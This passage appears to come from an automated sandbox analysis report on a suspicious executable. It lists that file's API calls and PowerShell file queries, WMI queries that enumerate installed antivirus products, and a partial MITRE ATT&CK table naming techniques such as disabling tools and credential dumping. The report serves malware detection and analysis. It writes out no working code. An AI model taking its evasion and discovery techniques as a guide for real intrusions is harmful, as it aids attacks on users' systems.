            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,_stricmp,_stricmp,9_2_6FDFF307
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,9_2_6FDFF136
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,strlen,9_2_6FDFF0DB
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,_stricmp,9_2_6FDFF034
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,11_2_6FD8888A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,11_2_6FD8871C
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,11_2_6FD886FD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,11_2_6FD865F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,11_2_6FD885AC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,11_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: strlen,EnumSystemLocalesA,11_2_6FDFF42E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: strlen,strlen,EnumSystemLocalesA,11_2_6FDFF3C7
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,_stricmp,_stricmp,11_2_6FDFF307
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,11_2_6FDFF136
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,strlen,11_2_6FDFF0DB
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetLocaleInfoA,_stricmp,11_2_6FDFF034
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_00D016F9 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_00D016F9
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD96340 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,9_2_6FD96340
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDBBCAE GetSystemInfo,memset,GetVersionExW,??0unsupported_os@Concurrency@@QAE@XZ,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,??0unsupported_os@Concurrency@@QAE@XZ,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,??0unsupported_os@Concurrency@@QAE@XZ,9_2_6FDBBCAE
            Source: powershell.exe, 00000004.00000002.30085176960.000001E7908CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		1
            Scripting            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		OS Credential Dumping2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
